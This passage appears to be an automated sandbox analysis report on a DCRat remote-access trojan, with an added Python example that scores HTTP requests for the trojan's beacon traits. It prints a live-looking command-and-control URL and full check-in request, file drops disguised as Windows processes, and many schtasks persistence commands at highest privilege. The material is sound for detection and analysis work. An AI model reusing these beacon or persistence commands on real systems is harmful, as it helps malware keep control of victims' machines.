Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003222000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003250000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ilusharx.beget.tech/L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i38
Source: oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
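The check-in request captured above is what the Suricata rule 2034194 (ET MALWARE DCRAT Activity (GET)) fires on, and it carries several traits that a Firefox 94 request never would: a Content-Type header on a GET, the same two name=value pairs repeated at the end of the query, two MD5-shaped (32-hex) parameter names, and no Accept-Language or Accept-Encoding despite the browser User-Agent. The following is an added example, not code from the report or from Suricata, that scores a raw HTTP request on those traits. The DCRat request is embedded exactly as listed above; the second request is a constructed benign control, and the assumption that a genuine Firefox navigation always carries Accept-Language and Accept-Encoding is the example's own.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# The request captured in the report above (request line and headers as listed).
SAMPLE_REQUEST = (
    "GET /L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O"
    "&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs"
    "&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4"
    "&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN"
    "&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O"
    "&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Content-Type: text/css\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0\r\n"
    "Host: ilusharx.beget.tech\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

# Constructed control (not from the report): an ordinary stylesheet fetch
# from the browser the sample impersonates.
BENIGN_REQUEST = (
    "GET /static/site.css?v=3 HTTP/1.1\r\n"
    "Accept: text/css,*/*;q=0.1\r\n"
    "Accept-Language: en-US,en;q=0.5\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0\r\n"
    "Host: example.com\r\n"
    "\r\n"
)

HEX32 = re.compile(r"[0-9a-f]{32}")
BROWSER_UA = re.compile(r"Mozilla/5\.0 .*(Firefox|Chrome|Safari)/")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, lower-cased headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def beacon_indicators(raw):
    """Return the traits of `raw` that match the DCRat check-in above.

    None of them is conclusive on its own; together they separate the beacon
    from a browser request that uses the very same User-Agent string.
    """
    method, target, headers = parse_request(raw)
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    hits = []

    # A GET has no body, so a Content-Type request header means the client set
    # it blindly; here it even claims text/css for a .php resource.
    if method == "GET" and "content-type" in headers:
        hits.append(f"GET with Content-Type: {headers['content-type']}")

    # The same name=value pair appears twice: a fixed parameter block was
    # appended to a query that already contained it.
    dups = [k for (k, _v), n in Counter(params).items() if n > 1]
    if dups:
        hits.append("duplicated query parameters: " + ", ".join(dups))

    # MD5-shaped parameter names are not something a web application declares.
    hex_names = [k for k, _v in params if HEX32.fullmatch(k)]
    if hex_names:
        hits.append(f"{len(hex_names)} 32-hex parameter names")

    # Assumption of this example: a real browser navigation always sends
    # Accept-Language and Accept-Encoding; a UA string alone is not enough.
    if BROWSER_UA.search(headers.get("user-agent", "")) and not (
        {"accept-language", "accept-encoding"} <= set(headers)
    ):
        hits.append("browser User-Agent without Accept-Language/Accept-Encoding")
    return hits


if __name__ == "__main__":
    for name, req in (("dcrat", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, beacon_indicators(req))
```

The same four checks translate directly into proxy-log or Zeek http.log queries; the Content-Type-on-GET and duplicated-parameter conditions in particular survive a change of C2 domain, which the domain-based Avira URL Cloud verdicts above do not.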
Source: C:\Users\user\Desktop\oFAjWuoHBq.exe | Code functions: 0_2_00007FF848F0AE60, 0_2_00007FF848F0A87D, 0_2_00007FF848F034AC, 0_2_00007FF848F0AD25, 0_2_00007FF848F0ACED, 0_2_00007FF848F09D61
Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Code functions: 17_2_00007FF848F4AE60, 17_2_00007FF848F4A87D, 17_2_00007FF848F434AC, 17_2_00007FF848F4AD25, 17_2_00007FF848F4ACED, 17_2_00007FF848F49D61
Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe | Code functions: 18_2_00007FF848F43645, 18_2_00007FF848F55E21, 18_2_00007FF848F52290, 18_2_00007FF848F56D28, 18_2_00007FF848F54D6D, 18_2_00007FF848F53768, 18_2_00007FF848F54448, 18_2_00007FF848F542E0, 18_2_00007FF848F50705, 18_2_00007FF848F51B50
Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe | Code functions: 19_2_00007FF848F2AE3D, 19_2_00007FF848F2A87D, 19_2_00007FF848F234AC, 19_2_00007FF848F2AD25, 19_2_00007FF848F2ACED, 19_2_00007FF848F29D61
Source: C:\Users\Public\AccountPictures\Registry.exe | Code functions: 20_2_00007FF848F03645, 20_2_00007FF848F15E21, 20_2_00007FF848F12290, 20_2_00007FF848F16D28, 20_2_00007FF848F13768, 20_2_00007FF848F14D6D, 20_2_00007FF848F14448, 20_2_00007FF848F142E0, 20_2_00007FF848F10705, 20_2_00007FF848F11B50
Source: C:\Users\Public\AccountPictures\Registry.exe | Code functions: 21_2_00007FF848F33645
Source: C:\Users\user\StartMenuExperienceHost.exe | Code functions: 22_2_00007FF848F1AE3D, 22_2_00007FF848F1A87D, 22_2_00007FF848F134AC, 22_2_00007FF848F1AD25, 22_2_00007FF848F1ACED, 22_2_00007FF848F19D61
Source: C:\Users\user\StartMenuExperienceHost.exe | Code functions: 23_2_00007FF848F35E21, 23_2_00007FF848F32290, 23_2_00007FF848F36D28, 23_2_00007FF848F33768, 23_2_00007FF848F34D6D, 23_2_00007FF848F34448, 23_2_00007FF848F342E0, 23_2_00007FF848F30705, 23_2_00007FF848F31B50, 23_2_00007FF848F23645
Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Code functions: 24_2_00007FF848F43645, 24_2_00007FF848F55E21, 24_2_00007FF848F52290, 24_2_00007FF848F56D28, 24_2_00007FF848F54D6D, 24_2_00007FF848F53768, 24_2_00007FF848F54448, 24_2_00007FF848F542E0, 24_2_00007FF848F50705, 24_2_00007FF848F51B50
Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Code functions: 25_2_00007FF848F43645, 25_2_00007FF848F55E21, 25_2_00007FF848F52290, 25_2_00007FF848F56D28, 25_2_00007FF848F54D6D, 25_2_00007FF848F53768, 25_2_00007FF848F54448, 25_2_00007FF848F542E0, 25_2_00007FF848F50705, 25_2_00007FF848F51B50
Source: oFAjWuoHBq.exe | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: Registry.exe.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: StartMenuExperienceHost.exe.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ctfmon.exe.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: oFAjWuoHBq.exe, 00000000.00000002.2030624734.0000000002B10000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilename$ vs oFAjWuoHBq.exe
Source: oFAjWuoHBq.exe, 00000000.00000002.2030758033.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilename( vs oFAjWuoHBq.exe
Source: oFAjWuoHBq.exe, 00000000.00000002.2054815171.000000001BE49000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs oFAjWuoHBq.exe
Source: oFAjWuoHBq.exe, 00000000.00000002.2053492926.000000001B500000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameDCLIB.dll, vs oFAjWuoHBq.exe
Source: oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename( vs oFAjWuoHBq.exe
Source: oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameDCLIB.dll, vs oFAjWuoHBq.exe
Source: oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUserPingCounter.dclib4 vs oFAjWuoHBq.exe
Source: oFAjWuoHBq.exe, 00000000.00000002.2053512000.000000001B510000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameUserPingCounter.dclib4 vs oFAjWuoHBq.exe
Source: oFAjWuoHBq.exe, 00000000.00000000.1999703425.000000000081E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs oFAjWuoHBq.exe
Source: oFAjWuoHBq.exe, 00000000.00000002.2033527159.000000001361C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename$ vs oFAjWuoHBq.exe
Source: oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C59000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename( vs oFAjWuoHBq.exe
Source: oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C18000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename( vs oFAjWuoHBq.exe
Source: oFAjWuoHBq.exe, 00000000.00000002.2030660866.0000000002B30000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilename( vs oFAjWuoHBq.exe
Source: oFAjWuoHBq.exe, 00000000.00000002.2053447566.000000001B4F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilename( vs oFAjWuoHBq.exe
Source: oFAjWuoHBq.exe | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs oFAjWuoHBq.exe
Source: oFAjWuoHBq.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: oFAjWuoHBq.exe, cs1uPX1FlBpBw3FANe7.cs | Cryptographic APIs: 'TransformBlock'
Source: oFAjWuoHBq.exe, cs1uPX1FlBpBw3FANe7.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: oFAjWuoHBq.exe, sWIJymEd3TnvLXnsdXU.cs | Cryptographic APIs: 'CreateDecryptor'
Source: oFAjWuoHBq.exe, sWIJymEd3TnvLXnsdXU.cs | Cryptographic APIs: 'CreateDecryptor'
Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2084176737.0000000001210000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;.VBP
Source: classification engine | Classification label: mal100.troj.evad.winEXE@26/20@1/1
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile created: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile created: C:\Users\Public\AccountPictures\Registry.exe
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeMutant created: NULL
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeMutant created: \Sessions\1\BaseNamedObjects\Local\b7eea1035ebcdf3fd6cd3ee1f8cb9ab983a1f666
            Source: oFAjWuoHBq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: oFAjWuoHBq.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: oFAjWuoHBq.exeReversingLabs: Detection: 78%
            Source: oFAjWuoHBq.exeVirustotal: Detection: 75%
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile read: C:\Users\user\Desktop\oFAjWuoHBq.exe
            Source: unknownProcess created: C:\Users\user\Desktop\oFAjWuoHBq.exe "C:\Users\user\Desktop\oFAjWuoHBq.exe"
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 9 /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgO" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 7 /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgO" /sc ONLOGON /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe "C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
            Source: unknownProcess created: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe "C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe"
            Source: unknownProcess created: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe "C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe"
            Source: unknownProcess created: C:\Users\Public\AccountPictures\Registry.exe C:\Users\Public\AccountPictures\Registry.exe
            Source: unknownProcess created: C:\Users\Public\AccountPictures\Registry.exe C:\Users\Public\AccountPictures\Registry.exe
            Source: unknownProcess created: C:\Users\user\StartMenuExperienceHost.exe C:\Users\user\StartMenuExperienceHost.exe
            Source: unknownProcess created: C:\Users\user\StartMenuExperienceHost.exe C:\Users\user\StartMenuExperienceHost.exe
            Source: unknownProcess created: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe "C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
            Source: unknownProcess created: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe "C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe "C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: mscoree.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: apphelp.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: wldp.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: profapi.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: amsi.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: userenv.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: propsys.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: edputil.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: urlmon.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: iertutil.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: srvcli.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: netutils.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: appresolver.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: slc.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: sppc.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
